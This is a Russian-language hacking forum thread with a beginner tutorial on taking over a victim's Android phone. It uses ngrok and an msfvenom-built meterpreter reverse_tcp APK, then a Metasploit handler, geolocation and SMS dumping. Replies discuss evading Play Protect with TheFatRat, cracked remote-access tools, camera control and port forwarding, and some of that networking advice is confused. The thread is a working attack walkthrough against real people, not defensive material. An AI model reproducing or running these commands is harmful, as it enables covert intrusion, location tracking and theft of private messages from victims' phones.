• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Проникновение в телефон через Metasploit + Ngrok

lukas

(L3) cache
Пользователь
Регистрация
11.10.2018
Сообщения
282
Реакции
691
Простенькая статья для новичков для улучшения понимания процесса получения контроля над удаленный девайсом. Речь пойдёт от ngrok и metasploit, и как можно взломать телефон и захватить управление

Сначала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачиваем сам ngrok.

ad6fa1d7c284c3fdeef10.png


Затем выкидываем его на рабочий стол и пишем: ngrok-stable-linux-amd64.zip

835d3c401f761c9e81a93.png

И пишем ./ngrok authtoken <TOKEN>

Прописываем в терминале ./ngrok tcp 4444

9bc7f0bb72f338948307c.png

Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
b4efa4c04fef76af7eb75.png

Теперь нам надо уже пойти к создания нашего пейлоада для телефона.

Для этого нам поможет msfvenom, для этого мы в новой консоле пишем:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk

Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Вот сам пейлоад готов, теперь мы должны кинуть его жертве.

Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a".

Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux).

Чтобы его запустить надо просто написать в консоле msfconsole.

И уже там пишем:

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit


После чего жертва запустит наш пайлоад, и у нас откроется сессия.

aed26bf86d149ce12db22.png

Теперь у нас есть доступ к телефону жертвы.

Давайте узнаем текущую геолокацию: geolocate

c73220647534cf0c3f1b2.png

Также можно сделать дамп всех смс, командой: sms_dump

360c2c14a9fb6b7b8d7b7.png

Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.
 
Я правильно понимаю что это работает только на Андроид? И на всех версиях ОС ?
Посмотри, какие платформы поддерживает meterpreter.

Жертва должна сама заинсталить .apk файл?
Если нет лоадера на устройстве или личного 0day в ОС/браузерах/мессенджерах, то да, только вручную.
 
А жертва должна быть подключена к тому же wifi что и я?И подскажите это зависло,или жертва не установила .apk?
 

Вложения

  • Screenshot_20200819-121603_Termux.png
    Screenshot_20200819-121603_Termux.png
    77.1 КБ · Просмотры: 58
Товарищи,подскажите,сделал все,как написано,получилось,только пейлоад не запускается.Установку из неизвестных источников разрешил.Андроиды 4,8.1,плюс на ноксе какой-то,не помню.Везде одно и то же-приложение не установлено.Делал на Кали
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Hello. Thanks for the info. Do I understand correctly that this only works on Android? And on all OS versions?

Should the victim install the .apk file hersel


the meterpreter payload gets detected by the android play protect, yep the victim need to install the apk file himself, i suggest to use the fatrat rather than using the meterpreter payload directly, fatrat supports android, mac, windows etc
 
Пожалуйста, обратите внимание, что пользователь заблокирован
This way, can we control the phone camera?
yu can control the phone camera using meterpreter session , there are more rats that do better than meter preter payload, a well obfucated venom software works good : https://venomcontrol.com/ there are cracked versions availabel
 
Пожалуйста, обратите внимание, что пользователь заблокирован
This way, can we control the phone camera?
yu can control the phone camera using meterpreter session , there are more rats that do better than meter preter payload, a well obfucated venom software works good : https://venomcontrol.com/ there are cracked versions availabel
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Does the victim have to be connected to the same wifi as me? And tell me it hangs, or the victim did not install the .apk?
yep the victim needs to be on local network if you want to use LHOST on meter preter , if the target is outside youre network you gotta perform port forwarding , and add the port forwareded ip in RHOST (remote host),
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх